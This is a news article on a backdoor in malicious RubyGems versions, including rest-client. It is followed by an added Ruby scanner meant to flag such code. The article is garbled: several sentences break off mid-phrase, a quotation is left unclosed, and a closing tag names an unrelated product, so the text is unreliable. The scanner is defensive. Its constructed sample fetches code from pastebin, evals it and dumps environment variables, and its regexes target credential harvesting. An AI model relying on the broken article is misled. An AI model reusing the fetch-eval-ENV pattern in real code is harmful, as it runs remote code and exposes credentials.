Maintainers of the RubyGems package repository have discovered a backdoor mechanism in 18 malicious versions of 11 Ruby libraries.
One of the most popular Ruby libraries, rest-client, was found to contain the malicious code yesterday.
The malicious code was included in four versions of rest-client.
“It seems that rest-client 1.6.13 is uploaded to rubygems.org. I did review between 1.6.9 and 1.6.13 and it seems that the latest version evaluates remote code from pastebin.com and sends information to mironanoru[.]zzz.com [.
The Ruby developer Jan Dintel, who analyzed the code, discovered that it would collect and send the environment variables of a compromised system (i.e. credentials of services used by the compromised system, such as use
“Depending on your
The backdoor could be triggered by the attacker by sending a signed cookie; the code would then send the captured credentials back to the attackers. The backdoor
The attacker is believed to have been active for more than a month without being detected, until the account of rest-client developer Matthew Manning was compromised and used to push four malicious versions of rest-client to RubyGems.
In total, the 18 malicious versions of the libraries were downloaded 3,584 times before being removed from RubyGems.
Projects that rely on the
In production, the code would download a payload from Pastebin.com and execute it to create the actual backdoor in the application that used the strong_password library.
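As an added example (not code from the article, from Jan Dintel's analysis, or from the rest-client project), the following Ruby script is a small static heuristic scanner a defender could run over installed gem sources to flag the pattern described above: fetching code from pastebin.com, evaluating it, and collecting ENV. The indicator regexes and the two sample snippets are constructed for this example.

```ruby
# Heuristic static scanner for the backdoor pattern described in the article.
# Added example; indicator patterns and samples are constructed, not real gem code.
SUSPICIOUS = {
  remote_fetch: /\bNet::HTTP\b|\bopen-uri\b|\bURI\.open\b|\bopen\(\s*["']https?:/,
  pastebin:     /pastebin\.com/i,
  eval:         /\b(eval|instance_eval|class_eval|module_eval)\s*[\(\s]/,
  env_dump:     /\bENV\.(to_h|to_a|each|map|select|inspect)\b/,
  c2_domain:    /mironanoru/i, # domain named in the article (defanged there)
}.freeze

# Returns the names of the indicators present in `source`, in table order.
def indicators_for(source)
  SUSPICIOUS.select { |_, re| source.match?(re) }.keys
end

# Flag when code is fetched remotely AND evaluated, when pastebin is contacted
# while ENV is dumped, or when the reported C2 domain appears at all.
def suspicious?(source)
  hits = indicators_for(source)
  (hits.include?(:remote_fetch) && hits.include?(:eval)) ||
    (hits.include?(:pastebin) && hits.include?(:env_dump)) ||
    hits.include?(:c2_domain)
end

# Scan every .rb file under `dir` (e.g. a Bundler gem path); returns path => hits.
def scan_gem_dir(dir)
  Dir.glob(File.join(dir, '**', '*.rb')).each_with_object({}) do |path, out|
    src = File.read(path).scrub # scrub avoids regex errors on invalid UTF-8
    out[path] = indicators_for(src) if suspicious?(src)
  end
end

# Constructed samples: an ordinary HTTP helper, and a snippet with the pattern.
BENIGN = <<~RUBY
  require 'net/http'
  def fetch_status(url)
    Net::HTTP.get_response(URI(url)).code
  end
RUBY

SUSPECT = <<~RUBY
  require 'net/http'
  code = Net::HTTP.get(URI('https://pastebin.com/raw/PLACEHOLDER'))
  eval(code)
  payload = ENV.to_h.inspect
RUBY

if __FILE__ == $0
  puts "benign: #{suspicious?(BENIGN)}, suspect: #{indicators_for(SUSPECT).inspect}"
  scan_gem_dir(ARGV[0]).each { |p, hits| puts "#{p}: #{hits.join(', ')}" } if ARGV[0]
end
```

Run it with a gem directory as the argument (for example the output of `bundle show rest-client`) to list files that match; a hit is a prompt for manual review, not proof of compromise.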
(SecurityAffairs – LibreOffice, hacking)